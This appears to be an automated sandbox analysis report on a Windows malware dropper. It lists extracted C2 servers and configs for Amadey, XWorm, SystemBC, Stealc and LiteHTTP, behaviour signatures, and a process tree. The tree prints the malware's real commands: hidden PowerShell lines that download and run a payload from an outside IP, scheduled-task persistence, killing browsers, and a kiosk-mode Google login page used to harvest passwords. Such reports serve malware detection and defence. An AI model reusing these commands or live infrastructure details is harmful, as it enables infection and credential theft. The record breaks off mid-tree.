Overview

overview

10

Static

static

5

06fb4f80ce...9f.exe

windows7-x64

10

06fb4f80ce...9f.exe

windows10-2004-x64

10

Analysis

  • max time kernel
    149s
  • max time network
    150s
  • platform
    windows7_x64
  • resource
    win7-20240903-en
  • resource tags

    arch:x64arch:x86image:win7-20240903-enlocale:en-usos:windows7-x64system
  • submitted
    05/03/2025, 23:06

Sharing

Copy URL
Twitter E-mail
Report Analysis Logs

General

  • Target

    06fb4f80cee614aa2a3e1d174c2bb34e6d70522d314b33246ec9e1d945e9639f.exe

  • Size

    938KB

  • MD5

    d8c7db0634dc3956c08f61096b6b8e9b

  • SHA1

    fc6c24b4fa8091514076611a49088bc087fc9f11

  • SHA256

    06fb4f80cee614aa2a3e1d174c2bb34e6d70522d314b33246ec9e1d945e9639f

  • SHA512

    51476aff3a60b4d536285849a675c28e3ce87bbfbc1b5ad6def9099cb7c3a9645114c92b572f58939d5d774f25a3d7f24fa9c24107f68ee62385fee8e2f1a580

  • SSDEEP

    24576:1qDEvCTbMWu7rQYlBQcBiT6rprG8a0Qu:1TvC/MTQYxsWR7a0Q

Score
10/10
amadeygcleanerhealerlitehttpstealcsystembcxworm092155trumpbotdefense_evasiondiscoverydropperevasionexecutionloaderpersistenceratspywarestealertrojan

Malware Config

Extracted

Language
ps1
Deobfuscated
URLs
exe.dropper

http://176.113.115.7/mine/random.exe

Extracted

Language
ps1
Deobfuscated
URLs
exe.dropper

http://176.113.115.7/mine/random.exe

Extracted

Language
ps1
Deobfuscated
URLs
exe.dropper

http://176.113.115.7/mine/random.exe

Extracted

Family

amadey

Version

5.21

Botnet

092155

C2

http://176.113.115.6

Attributes
  • install_dir

    bb556cff4a

  • install_file

    rapes.exe

  • strings_key

    a131b127e996a898cd19ffb2d92e481b

  • url_paths

    /Ni9kiput/index.php

rc4.plain

Extracted

Family

xworm

Version

5.0

C2

45.154.98.175:6969

Mutex

uGmGtmYAbzOi1F41

Attributes
  • Install_directory

    %AppData%

  • install_file

    google_updates.exe

aes.plain

Extracted

Family

systembc

C2

towerbingobongoboom.com

62.60.226.86
Attributes
  • dns

    5.132.191.104

Extracted

Family

stealc

Botnet

trump

C2

http://45.93.20.28

Attributes
  • url_path

    /85a1cacf11314eb8.php

Extracted

Family

litehttp

Version

v1.0.9

C2

http://185.208.156.162/page.php

Attributes
  • key

    v1d6kd29g85cm8jp4pv8tvflvg303gbl

Signatures

  • Amadey

    Amadey bot is a simple trojan bot primarily used for collecting reconnaissance information.

    trojanamadey
  • Amadey family
    amadey
  • Detect Xworm Payload 2 IoCs
  • Detects Healer an antivirus disabler dropper 2 IoCs
  • GCleaner

    GCleaner is a Pay-Per-Install malware loader first discovered in early 2019.

    loadergcleaner
  • Gcleaner family
    gcleaner
  • Healer

    Healer an antivirus disabler dropper.

    dropperhealer
  • Healer family
    healer
  • LiteHTTP

    LiteHTTP is an open-source bot written in C#.

    stealerbotlitehttp
  • Litehttp family
    litehttp
  • Modifies Windows Defender DisableAntiSpyware settings 3 TTPs 1 IoCs
    evasiontrojan
  • Modifies Windows Defender Real-time Protection settings 3 TTPs 6 IoCs
    defense_evasiontrojan
  • Modifies Windows Defender TamperProtection settings 3 TTPs 1 IoCs
    evasiontrojan
  • Modifies Windows Defender notification settings 3 TTPs 2 IoCs
    defense_evasiontrojan
  • Stealc

    Stealc is an infostealer written in C++.

    stealerstealc
  • Stealc family
    stealc
  • SystemBC

    SystemBC is a proxy and remote administration tool first seen in 2019.

    trojansystembc
  • Systembc family
    systembc
  • Xworm

    Xworm is a remote access trojan written in C#.

    trojanratxworm
  • Xworm family
    xworm
  • Identifies VirtualBox via ACPI registry values (likely anti-VM) 2 TTPs 13 IoCs
    defense_evasion
  • Blocklisted process makes network request 3 IoCs
  • Command and Scripting Interpreter: PowerShell 1 TTPs 10 IoCs

    Run Powershell to modify Windows Defender settings to add exclusions for file extensions, paths, and processes.

    execution
  • Downloads MZ/PE file 23 IoCs
  • .NET Reactor proctector 2 IoCs

    Detects an executable protected by an unregistered version of Eziriz's .NET Reactor.

  • Checks BIOS information in registry 2 TTPs 26 IoCs

    BIOS information is often read in order to detect sandboxing environments.

  • Drops startup file 2 IoCs
  • Executes dropped EXE 29 IoCs
  • Identifies Wine through registry keys 2 TTPs 13 IoCs

    Wine is a compatibility layer capable of running Windows applications, which can be used as sandboxing environment.

    defense_evasion
  • Loads dropped DLL 64 IoCs
  • Reads user/profile data of local email clients 2 TTPs

    Email clients store some user data on disk where infostealers will often target it.

    spywarestealer
  • Reads user/profile data of web browsers 3 TTPs

    Infostealers often target stored browser data, which can include saved credentials etc.

    spywarestealer
  • Windows security modification 2 TTPs 2 IoCs
    defense_evasiontrojan
  • Accesses cryptocurrency files/wallets, possible credential harvesting 2 TTPs
    spyware
  • Adds Run key to start application 2 TTPs 8 IoCs
    persistence
  • Checks installed software on the system 1 TTPs

    Looks up Uninstall key entries in the registry to enumerate software on the system.

    discovery
  • AutoIT Executable 2 IoCs

    AutoIT scripts compiled to PE executables.

  • Suspicious use of NtSetInformationThreadHideFromDebugger 13 IoCs
  • Suspicious use of SetThreadContext 5 IoCs
  • Drops file in Windows directory 3 IoCs
  • Browser Information Discovery 1 TTPs

    Enumerate browser information.

    discovery
  • Enumerates physical storage devices 1 TTPs

    Attempts to interact with connected storage/optical drive(s).

  • Program crash 8 IoCs
  • System Location Discovery: System Language Discovery 1 TTPs 51 IoCs

    Attempt gather information about the system language of a victim in order to infer the geographical location of that host.

    discovery
  • Checks processor information in registry 2 TTPs 6 IoCs

    Processor information is often read in order to detect sandboxing environments.

  • Delays execution with timeout.exe 1 IoCs
    defense_evasion
  • Kills process with taskkill 5 IoCs
    defense_evasion
  • Modifies Internet Explorer settings 1 TTPs 3 IoCs
    adwarespyware
  • Modifies registry class 1 IoCs
  • Modifies system certificate store 2 TTPs 3 IoCs
    defense_evasionspywaretrojan
  • Scheduled Task/Job: Scheduled Task 1 TTPs 3 IoCs

    Schtasks is often used by malware for persistence or to perform post-infection execution.

    persistenceexecution
  • Suspicious behavior: EnumeratesProcesses 46 IoCs
  • Suspicious use of AdjustPrivilegeToken 19 IoCs
  • Suspicious use of FindShellTrayWindow 22 IoCs
  • Suspicious use of SendNotifyMessage 19 IoCs
  • Suspicious use of SetWindowsHookEx 1 IoCs
  • Suspicious use of WriteProcessMemory 64 IoCs
  • Uses Task Scheduler COM API 1 TTPs

    The Task Scheduler COM API can be used to schedule applications to run on boot or at set times.

    persistence

Processes

  • C:\Users\Admin\AppData\Local\Temp\06fb4f80cee614aa2a3e1d174c2bb34e6d70522d314b33246ec9e1d945e9639f.exe
    "C:\Users\Admin\AppData\Local\Temp\06fb4f80cee614aa2a3e1d174c2bb34e6d70522d314b33246ec9e1d945e9639f.exe"
    1⤵
    • System Location Discovery: System Language Discovery
    • Suspicious use of FindShellTrayWindow
    • Suspicious use of SendNotifyMessage
    • Suspicious use of WriteProcessMemory
    PID:2688
    • C:\Windows\SysWOW64\cmd.exe
      C:\Windows\system32\cmd.exe /c schtasks /create /tn zhMA3ma2QWa /tr "mshta C:\Users\Admin\AppData\Local\Temp\eFSASVJL1.hta" /sc minute /mo 25 /ru "Admin" /f
      2⤵
      • System Location Discovery: System Language Discovery
      • Suspicious use of WriteProcessMemory
      PID:2768
      • C:\Windows\SysWOW64\schtasks.exe
        schtasks /create /tn zhMA3ma2QWa /tr "mshta C:\Users\Admin\AppData\Local\Temp\eFSASVJL1.hta" /sc minute /mo 25 /ru "Admin" /f
        3⤵
        • System Location Discovery: System Language Discovery
        • Scheduled Task/Job: Scheduled Task
        PID:2928
    • C:\Windows\SysWOW64\mshta.exe
      mshta C:\Users\Admin\AppData\Local\Temp\eFSASVJL1.hta
      2⤵
      • System Location Discovery: System Language Discovery
      • Modifies Internet Explorer settings
      • Suspicious use of WriteProcessMemory
      PID:2772
      • C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
        "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -WindowStyle Hidden $d=$env:temp+'OYDYK0OQRLM5YDLB8DCEE9MFD5X2FUUS.EXE';(New-Object System.Net.WebClient).DownloadFile('http://176.113.115.7/mine/random.exe',$d);Start-Process $d;
        3⤵
        • Blocklisted process makes network request
        • Command and Scripting Interpreter: PowerShell
        • Downloads MZ/PE file
        • Loads dropped DLL
        • System Location Discovery: System Language Discovery
        • Suspicious behavior: EnumeratesProcesses
        • Suspicious use of AdjustPrivilegeToken
        • Suspicious use of WriteProcessMemory
        PID:2924
        • C:\Users\Admin\AppData\Local\TempOYDYK0OQRLM5YDLB8DCEE9MFD5X2FUUS.EXE
          "C:\Users\Admin\AppData\Local\TempOYDYK0OQRLM5YDLB8DCEE9MFD5X2FUUS.EXE"
          4⤵
          • Identifies VirtualBox via ACPI registry values (likely anti-VM)
          • Checks BIOS information in registry
          • Executes dropped EXE
          • Identifies Wine through registry keys
          • Loads dropped DLL
          • Suspicious use of NtSetInformationThreadHideFromDebugger
          • Drops file in Windows directory
          • System Location Discovery: System Language Discovery
          • Suspicious behavior: EnumeratesProcesses
          • Suspicious use of FindShellTrayWindow
          • Suspicious use of WriteProcessMemory
          PID:2588
          • C:\Users\Admin\AppData\Local\Temp\bb556cff4a\rapes.exe
            "C:\Users\Admin\AppData\Local\Temp\bb556cff4a\rapes.exe"
            5⤵
            • Identifies VirtualBox via ACPI registry values (likely anti-VM)
            • Downloads MZ/PE file
            • Checks BIOS information in registry
            • Executes dropped EXE
            • Identifies Wine through registry keys
            • Loads dropped DLL
            • Adds Run key to start application
            • Suspicious use of NtSetInformationThreadHideFromDebugger
            • System Location Discovery: System Language Discovery
            • Suspicious behavior: EnumeratesProcesses
            • Suspicious use of WriteProcessMemory
            PID:2108
            • C:\Users\Admin\AppData\Local\Temp\10107310101\nhDLtPT.exe
              "C:\Users\Admin\AppData\Local\Temp\10107310101\nhDLtPT.exe"
              6⤵
              • Executes dropped EXE
              • Loads dropped DLL
              • Drops file in Windows directory
              • System Location Discovery: System Language Discovery
              • Suspicious use of FindShellTrayWindow
              • Suspicious use of WriteProcessMemory
              PID:2400
              • C:\Users\Admin\AppData\Local\Temp\a58456755d\Gxtuum.exe
                "C:\Users\Admin\AppData\Local\Temp\a58456755d\Gxtuum.exe"
                7⤵
                • Downloads MZ/PE file
                • Executes dropped EXE
                • Loads dropped DLL
                • System Location Discovery: System Language Discovery
                • Suspicious use of WriteProcessMemory
                PID:2240
                • C:\Users\Admin\AppData\Roaming\10000770100\vertualiziren.exe
                  "C:\Users\Admin\AppData\Roaming\10000770100\vertualiziren.exe"
                  8⤵
                  • Identifies VirtualBox via ACPI registry values (likely anti-VM)
                  • Checks BIOS information in registry
                  • Executes dropped EXE
                  • Identifies Wine through registry keys
                  • Suspicious use of NtSetInformationThreadHideFromDebugger
                  • Drops file in Windows directory
                  • System Location Discovery: System Language Discovery
                  • Suspicious behavior: EnumeratesProcesses
                  PID:600
            • C:\Users\Admin\AppData\Local\Temp\10107420101\cnntXtU.exe
              "C:\Users\Admin\AppData\Local\Temp\10107420101\cnntXtU.exe"
              6⤵
              • Drops startup file
              • Executes dropped EXE
              • Adds Run key to start application
              • Suspicious behavior: EnumeratesProcesses
              • Suspicious use of AdjustPrivilegeToken
              • Suspicious use of SetWindowsHookEx
              PID:2484
            • C:\Users\Admin\AppData\Local\Temp\10107440101\cd0ae9eb0c.exe
              "C:\Users\Admin\AppData\Local\Temp\10107440101\cd0ae9eb0c.exe"
              6⤵
              • Executes dropped EXE
              • System Location Discovery: System Language Discovery
              • Suspicious use of FindShellTrayWindow
              • Suspicious use of SendNotifyMessage
              • Suspicious use of WriteProcessMemory
              PID:2072
              • C:\Windows\SysWOW64\cmd.exe
                C:\Windows\system32\cmd.exe /c schtasks /create /tn 8oFa0maGBGe /tr "mshta C:\Users\Admin\AppData\Local\Temp\Bjuo1Ytnk.hta" /sc minute /mo 25 /ru "Admin" /f
                7⤵
                • System Location Discovery: System Language Discovery
                • Suspicious use of WriteProcessMemory
                PID:1896
                • C:\Windows\SysWOW64\schtasks.exe
                  schtasks /create /tn 8oFa0maGBGe /tr "mshta C:\Users\Admin\AppData\Local\Temp\Bjuo1Ytnk.hta" /sc minute /mo 25 /ru "Admin" /f
                  8⤵
                  • System Location Discovery: System Language Discovery
                  • Scheduled Task/Job: Scheduled Task
                  PID:3036
              • C:\Windows\SysWOW64\mshta.exe
                mshta C:\Users\Admin\AppData\Local\Temp\Bjuo1Ytnk.hta
                7⤵
                • System Location Discovery: System Language Discovery
                • Modifies Internet Explorer settings
                • Suspicious use of WriteProcessMemory
                PID:1900
                • C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                  "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -WindowStyle Hidden $d=$env:temp+'OJENHEM5RVI5HVW55SXT5KLKS6NV18D1.EXE';(New-Object System.Net.WebClient).DownloadFile('http://176.113.115.7/mine/random.exe',$d);Start-Process $d;
                  8⤵
                  • Blocklisted process makes network request
                  • Command and Scripting Interpreter: PowerShell
                  • Downloads MZ/PE file
                  • Loads dropped DLL
                  • System Location Discovery: System Language Discovery
                  • Suspicious behavior: EnumeratesProcesses
                  • Suspicious use of AdjustPrivilegeToken
                  • Suspicious use of WriteProcessMemory
                  PID:1516
                  • C:\Users\Admin\AppData\Local\TempOJENHEM5RVI5HVW55SXT5KLKS6NV18D1.EXE
                    "C:\Users\Admin\AppData\Local\TempOJENHEM5RVI5HVW55SXT5KLKS6NV18D1.EXE"
                    9⤵
                    • Identifies VirtualBox via ACPI registry values (likely anti-VM)
                    • Checks BIOS information in registry
                    • Executes dropped EXE
                    • Identifies Wine through registry keys
                    • Suspicious use of NtSetInformationThreadHideFromDebugger
                    • Suspicious behavior: EnumeratesProcesses
                    PID:2392
            • C:\Windows\SysWOW64\cmd.exe
              cmd /c ""C:\Users\Admin\AppData\Local\Temp\10107450121\am_no.cmd" "
              6⤵
              • System Location Discovery: System Language Discovery
              PID:2836
              • C:\Windows\SysWOW64\timeout.exe
                timeout /t 2
                7⤵
                • System Location Discovery: System Language Discovery
                • Delays execution with timeout.exe
                PID:2984
              • C:\Windows\SysWOW64\cmd.exe
                C:\Windows\system32\cmd.exe /c powershell -command "-join ((48..57) + (65..90) + (97..122) | Get-Random -Count 9 | ForEach-Object {[char]$_})"
                7⤵
                • System Location Discovery: System Language Discovery
                PID:1548
                • C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                  powershell -command "-join ((48..57) + (65..90) + (97..122) | Get-Random -Count 9 | ForEach-Object {[char]$_})"
                  8⤵
                  • Command and Scripting Interpreter: PowerShell
                  • System Location Discovery: System Language Discovery
                  • Suspicious behavior: EnumeratesProcesses
                  • Suspicious use of AdjustPrivilegeToken
                  PID:2396
              • C:\Windows\SysWOW64\cmd.exe
                C:\Windows\system32\cmd.exe /c powershell -command "-join ((48..57) + (65..90) + (97..122) | Get-Random -Count 5 | ForEach-Object {[char]$_})"
                7⤵
                • System Location Discovery: System Language Discovery
                PID:1772
                • C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                  powershell -command "-join ((48..57) + (65..90) + (97..122) | Get-Random -Count 5 | ForEach-Object {[char]$_})"
                  8⤵
                  • Command and Scripting Interpreter: PowerShell
                  • System Location Discovery: System Language Discovery
                  • Suspicious behavior: EnumeratesProcesses
                  • Suspicious use of AdjustPrivilegeToken
                  PID:1724
              • C:\Windows\SysWOW64\cmd.exe
                C:\Windows\system32\cmd.exe /c powershell -command "-join ((48..57) + (65..90) + (97..122) | Get-Random -Count 4 | ForEach-Object {[char]$_})"
                7⤵
                • System Location Discovery: System Language Discovery
                PID:1236
                • C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                  powershell -command "-join ((48..57) + (65..90) + (97..122) | Get-Random -Count 4 | ForEach-Object {[char]$_})"
                  8⤵
                  • Command and Scripting Interpreter: PowerShell
                  • System Location Discovery: System Language Discovery
                  • Suspicious behavior: EnumeratesProcesses
                  • Suspicious use of AdjustPrivilegeToken
                  PID:1460
              • C:\Windows\SysWOW64\schtasks.exe
                schtasks /create /tn "f2QhvmaOIYD" /tr "mshta \"C:\Temp\GH8RmsOFg.hta\"" /sc minute /mo 25 /ru "Admin" /f
                7⤵
                • System Location Discovery: System Language Discovery
                • Scheduled Task/Job: Scheduled Task
                PID:1912
              • C:\Windows\SysWOW64\mshta.exe
                mshta "C:\Temp\GH8RmsOFg.hta"
                7⤵
                • System Location Discovery: System Language Discovery
                • Modifies Internet Explorer settings
                PID:1420
                • C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                  "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -WindowStyle Hidden $d=$env:temp+'\483d2fa8a0d53818306efeb32d3.exe';(New-Object System.Net.WebClient).DownloadFile('http://176.113.115.7/mine/random.exe',$d);Start-Process $d;
                  8⤵
                  • Blocklisted process makes network request
                  • Command and Scripting Interpreter: PowerShell
                  • Downloads MZ/PE file
                  • Loads dropped DLL
                  • System Location Discovery: System Language Discovery
                  • Suspicious behavior: EnumeratesProcesses
                  • Suspicious use of AdjustPrivilegeToken
                  PID:3032
                  • C:\Users\Admin\AppData\Local\Temp\483d2fa8a0d53818306efeb32d3.exe
                    "C:\Users\Admin\AppData\Local\Temp\483d2fa8a0d53818306efeb32d3.exe"
                    9⤵
                    • Identifies VirtualBox via ACPI registry values (likely anti-VM)
                    • Checks BIOS information in registry
                    • Executes dropped EXE
                    • Identifies Wine through registry keys
                    • Suspicious use of NtSetInformationThreadHideFromDebugger
                    • Suspicious behavior: EnumeratesProcesses
                    PID:900
            • C:\Users\Admin\AppData\Local\Temp\10107670101\cd4e8b5947.exe
              "C:\Users\Admin\AppData\Local\Temp\10107670101\cd4e8b5947.exe"
              6⤵
              • Identifies VirtualBox via ACPI registry values (likely anti-VM)
              • Checks BIOS information in registry
              • Executes dropped EXE
              • Identifies Wine through registry keys
              • Suspicious use of NtSetInformationThreadHideFromDebugger
              • Suspicious use of SetThreadContext
              • System Location Discovery: System Language Discovery
              • Suspicious behavior: EnumeratesProcesses
              PID:2144
              • C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe
                "C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe"
                7⤵
                • Downloads MZ/PE file
                • Loads dropped DLL
                • System Location Discovery: System Language Discovery
                PID:1420
            • C:\Users\Admin\AppData\Local\Temp\10107680101\9cab6ad180.exe
              "C:\Users\Admin\AppData\Local\Temp\10107680101\9cab6ad180.exe"
              6⤵
              • Executes dropped EXE
              • Loads dropped DLL
              • Suspicious use of SetThreadContext
              • System Location Discovery: System Language Discovery
              • Suspicious use of AdjustPrivilegeToken
              PID:1532
              • C:\Users\Admin\AppData\Local\Temp\10107680101\9cab6ad180.exe
                "C:\Users\Admin\AppData\Local\Temp\10107680101\9cab6ad180.exe"
                7⤵
                • Executes dropped EXE
                • System Location Discovery: System Language Discovery
                PID:1688
                • C:\Windows\SysWOW64\WerFault.exe
                  C:\Windows\SysWOW64\WerFault.exe -u -p 1688 -s 1028
                  8⤵
                  • Loads dropped DLL
                  • Program crash
                  PID:2884
              • C:\Windows\SysWOW64\WerFault.exe
                C:\Windows\SysWOW64\WerFault.exe -u -p 1532 -s 508
                7⤵
                • Loads dropped DLL
                • Program crash
                PID:1156
            • C:\Users\Admin\AppData\Local\Temp\10107690101\cb98fa6f53.exe
              "C:\Users\Admin\AppData\Local\Temp\10107690101\cb98fa6f53.exe"
              6⤵
              • Identifies VirtualBox via ACPI registry values (likely anti-VM)
              • Checks BIOS information in registry
              • Executes dropped EXE
              • Identifies Wine through registry keys
              • Suspicious use of NtSetInformationThreadHideFromDebugger
              • Suspicious use of SetThreadContext
              • System Location Discovery: System Language Discovery
              • Suspicious behavior: EnumeratesProcesses
              PID:2508
              • C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe
                "C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe"
                7⤵
                • Downloads MZ/PE file
                • Loads dropped DLL
                • System Location Discovery: System Language Discovery
                PID:1572
            • C:\Users\Admin\AppData\Local\Temp\10107700101\c77bb98cda.exe
              "C:\Users\Admin\AppData\Local\Temp\10107700101\c77bb98cda.exe"
              6⤵
              • Identifies VirtualBox via ACPI registry values (likely anti-VM)
              • Checks BIOS information in registry
              • Executes dropped EXE
              • Identifies Wine through registry keys
              • Suspicious use of NtSetInformationThreadHideFromDebugger
              • System Location Discovery: System Language Discovery
              • Modifies system certificate store
              • Suspicious behavior: EnumeratesProcesses
              PID:1780
            • C:\Users\Admin\AppData\Local\Temp\10107710101\51a7d2c853.exe
              "C:\Users\Admin\AppData\Local\Temp\10107710101\51a7d2c853.exe"
              6⤵
              • Identifies VirtualBox via ACPI registry values (likely anti-VM)
              • Checks BIOS information in registry
              • Executes dropped EXE
              • Identifies Wine through registry keys
              • Suspicious use of NtSetInformationThreadHideFromDebugger
              • System Location Discovery: System Language Discovery
              • Suspicious behavior: EnumeratesProcesses
              PID:2836
              • C:\Windows\SysWOW64\WerFault.exe
                C:\Windows\SysWOW64\WerFault.exe -u -p 2836 -s 1200
                7⤵
                • Loads dropped DLL
                • Program crash
                PID:2356
            • C:\Users\Admin\AppData\Local\Temp\10107720101\65ac27f01e.exe
              "C:\Users\Admin\AppData\Local\Temp\10107720101\65ac27f01e.exe"
              6⤵
              • Identifies VirtualBox via ACPI registry values (likely anti-VM)
              • Checks BIOS information in registry
              • Executes dropped EXE
              • Identifies Wine through registry keys
              • Suspicious use of NtSetInformationThreadHideFromDebugger
              • System Location Discovery: System Language Discovery
              • Suspicious behavior: EnumeratesProcesses
              PID:2664
            • C:\Users\Admin\AppData\Local\Temp\10107730101\ef30a65d57.exe
              "C:\Users\Admin\AppData\Local\Temp\10107730101\ef30a65d57.exe"
              6⤵
              • Executes dropped EXE
              • System Location Discovery: System Language Discovery
              • Suspicious behavior: EnumeratesProcesses
              • Suspicious use of FindShellTrayWindow
              • Suspicious use of SendNotifyMessage
              PID:2956
              • C:\Windows\SysWOW64\taskkill.exe
                taskkill /F /IM firefox.exe /T
                7⤵
                • System Location Discovery: System Language Discovery
                • Kills process with taskkill
                • Suspicious use of AdjustPrivilegeToken
                PID:1540
              • C:\Windows\SysWOW64\taskkill.exe
                taskkill /F /IM chrome.exe /T
                7⤵
                • System Location Discovery: System Language Discovery
                • Kills process with taskkill
                • Suspicious use of AdjustPrivilegeToken
                PID:2084
              • C:\Windows\SysWOW64\taskkill.exe
                taskkill /F /IM msedge.exe /T
                7⤵
                • System Location Discovery: System Language Discovery
                • Kills process with taskkill
                • Suspicious use of AdjustPrivilegeToken
                PID:284
              • C:\Windows\SysWOW64\taskkill.exe
                taskkill /F /IM opera.exe /T
                7⤵
                • System Location Discovery: System Language Discovery
                • Kills process with taskkill
                • Suspicious use of AdjustPrivilegeToken
                PID:1948
              • C:\Windows\SysWOW64\taskkill.exe
                taskkill /F /IM brave.exe /T
                7⤵
                • System Location Discovery: System Language Discovery
                • Kills process with taskkill
                • Suspicious use of AdjustPrivilegeToken
                PID:2872
              • C:\Program Files\Mozilla Firefox\firefox.exe
                "C:\Program Files\Mozilla Firefox\firefox.exe" --kiosk "https://youtube.com/account?=https://accounts.google.com/v3/signin/challenge/pwd" --no-default-browser-check --disable-popup-blocking
                7⤵
                  PID:332
                  • C:\Program Files\Mozilla Firefox\firefox.exe
                    "C:\Program Files\Mozilla Firefox\firefox.exe" --kiosk https://youtube.com/account?=https://accounts.google.com/v3/signin/challenge/pwd --no-default-browser-check --disable-popup-blocking
                    8⤵
                    • Checks processor information in registry
                    • Modifies registry class
                    • Suspicious use of AdjustPrivilegeToken
                    • Suspicious use of FindShellTrayWindow
                    • Suspicious use of SendNotifyMessage
                    PID:2176
                    • C:\Program Files\Mozilla Firefox\firefox.exe
                      "C:\Program Files\Mozilla Firefox\firefox.exe" -contentproc --channel="2176.0.1343690239\1625897888" -parentBuildID 20221007134813 -prefsHandle 1212 -prefMapHandle 1204 -prefsLen 20847 -prefMapSize 233444 -appDir "C:\Program Files\Mozilla Firefox\browser" - {1c58ad70-77ce-4714-a16d-718e2daf80da} 2176 "\\.\pipe\gecko-crash-server-pipe.2176" 1288 110b7858 gpu
                      9⤵
                        PID:2636
                      • C:\Program Files\Mozilla Firefox\firefox.exe
                        "C:\Program Files\Mozilla Firefox\firefox.exe" -contentproc --channel="2176.1.694409263\743002394" -parentBuildID 20221007134813 -prefsHandle 1480 -prefMapHandle 1476 -prefsLen 21708 -prefMapSize 233444 -appDir "C:\Program Files\Mozilla Firefox\browser" - {4d366d0d-4de4-478b-ad16-c0a158ce176b} 2176 "\\.\pipe\gecko-crash-server-pipe.2176" 1492 e74258 socket
                        9⤵
                          PID:1952
                        • C:\Program Files\Mozilla Firefox\firefox.exe
                          "C:\Program Files\Mozilla Firefox\firefox.exe" -contentproc --channel="2176.2.755936859\1884948793" -childID 1 -isForBrowser -prefsHandle 2056 -prefMapHandle 2052 -prefsLen 21746 -prefMapSize 233444 -jsInitHandle 864 -jsInitLen 246848 -a11yResourceId 64 -parentBuildID 20221007134813 -appDir "C:\Program Files\Mozilla Firefox\browser" - {8d284488-94dc-43c2-8703-eef4d499d07a} 2176 "\\.\pipe\gecko-crash-server-pipe.2176" 2068 19ea9358 tab
                          9⤵
                            PID:2932
                          • C:\Program Files\Mozilla Firefox\firefox.exe
                            "C:\Program Files\Mozilla Firefox\firefox.exe" -contentproc --channel="2176.3.668382452\2020364546" -childID 2 -isForBrowser -prefsHandle 2912 -prefMapHandle 2908 -prefsLen 26216 -prefMapSize 233444 -jsInitHandle 864 -jsInitLen 246848 -a11yResourceId 64 -parentBuildID 20221007134813 -appDir "C:\Program Files\Mozilla Firefox\browser" - {10ce6ca1-5ffc-4de3-ba77-71250d0d15d8} 2176 "\\.\pipe\gecko-crash-server-pipe.2176" 2924 e64858 tab
                            9⤵
                              PID:1772
                            • C:\Program Files\Mozilla Firefox\firefox.exe
                              "C:\Program Files\Mozilla Firefox\firefox.exe" -contentproc --channel="2176.4.957323284\231409263" -childID 3 -isForBrowser -prefsHandle 3804 -prefMapHandle 3812 -prefsLen 26351 -prefMapSize 233444 -jsInitHandle 864 -jsInitLen 246848 -a11yResourceId 64 -parentBuildID 20221007134813 -appDir "C:\Program Files\Mozilla Firefox\browser" - {ba4ef1ef-4c74-45c0-aa97-ba1ccee776fd} 2176 "\\.\pipe\gecko-crash-server-pipe.2176" 3824 1fccb858 tab
                              9⤵
                                PID:316
                              • C:\Program Files\Mozilla Firefox\firefox.exe
                                "C:\Program Files\Mozilla Firefox\firefox.exe" -contentproc --channel="2176.5.972541004\640143421" -childID 4 -isForBrowser -prefsHandle 3948 -prefMapHandle 3952 -prefsLen 26351 -prefMapSize 233444 -jsInitHandle 864 -jsInitLen 246848 -a11yResourceId 64 -parentBuildID 20221007134813 -appDir "C:\Program Files\Mozilla Firefox\browser" - {0e0004a2-230c-4dfe-8201-712d705526be} 2176 "\\.\pipe\gecko-crash-server-pipe.2176" 3940 1fcf4858 tab
                                9⤵
                                  PID:2568
                                • C:\Program Files\Mozilla Firefox\firefox.exe
                                  "C:\Program Files\Mozilla Firefox\firefox.exe" -contentproc --channel="2176.6.1844910257\749227326" -childID 5 -isForBrowser -prefsHandle 4068 -prefMapHandle 3796 -prefsLen 26432 -prefMapSize 233444 -jsInitHandle 864 -jsInitLen 246848 -a11yResourceId 64 -parentBuildID 20221007134813 -appDir "C:\Program Files\Mozilla Firefox\browser" - {f44240c1-0e27-40ac-b4f5-3507ce3bf15a} 2176 "\\.\pipe\gecko-crash-server-pipe.2176" 4056 1fcf2458 tab
                                  9⤵
                                    PID:1388
                            • C:\Users\Admin\AppData\Local\Temp\10107740101\e6410dd2f6.exe
                              "C:\Users\Admin\AppData\Local\Temp\10107740101\e6410dd2f6.exe"
                              6⤵
                              • Modifies Windows Defender DisableAntiSpyware settings
                              • Modifies Windows Defender Real-time Protection settings
                              • Modifies Windows Defender TamperProtection settings
                              • Modifies Windows Defender notification settings
                              • Identifies VirtualBox via ACPI registry values (likely anti-VM)
                              • Checks BIOS information in registry
                              • Executes dropped EXE
                              • Identifies Wine through registry keys
                              • Windows security modification
                              • Suspicious use of NtSetInformationThreadHideFromDebugger
                              • System Location Discovery: System Language Discovery
                              • Suspicious behavior: EnumeratesProcesses
                              • Suspicious use of AdjustPrivilegeToken
                              PID:3500
                            • C:\Users\Admin\AppData\Local\Temp\10107750101\zY9sqWs.exe
                              "C:\Users\Admin\AppData\Local\Temp\10107750101\zY9sqWs.exe"
                              6⤵
                              • Executes dropped EXE
                              • System Location Discovery: System Language Discovery
                              PID:3764
                              • C:\Windows\SysWOW64\WerFault.exe
                                C:\Windows\SysWOW64\WerFault.exe -u -p 3764 -s 1048
                                7⤵
                                • Loads dropped DLL
                                • Program crash
                                PID:1828
                            • C:\Users\Admin\AppData\Local\Temp\10107760101\PcAIvJ0.exe
                              "C:\Users\Admin\AppData\Local\Temp\10107760101\PcAIvJ0.exe"
                              6⤵
                              • Executes dropped EXE
                              PID:3868
                              • C:\Windows\system32\cmd.exe
                                "C:\Windows\system32\cmd.exe" /c "C:\Users\Admin\AppData\Local\Temp\7FE9.tmp\7FEA.tmp\7FEB.bat C:\Users\Admin\AppData\Local\Temp\10107760101\PcAIvJ0.exe"
                                7⤵
                                  PID:3900
                                  • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
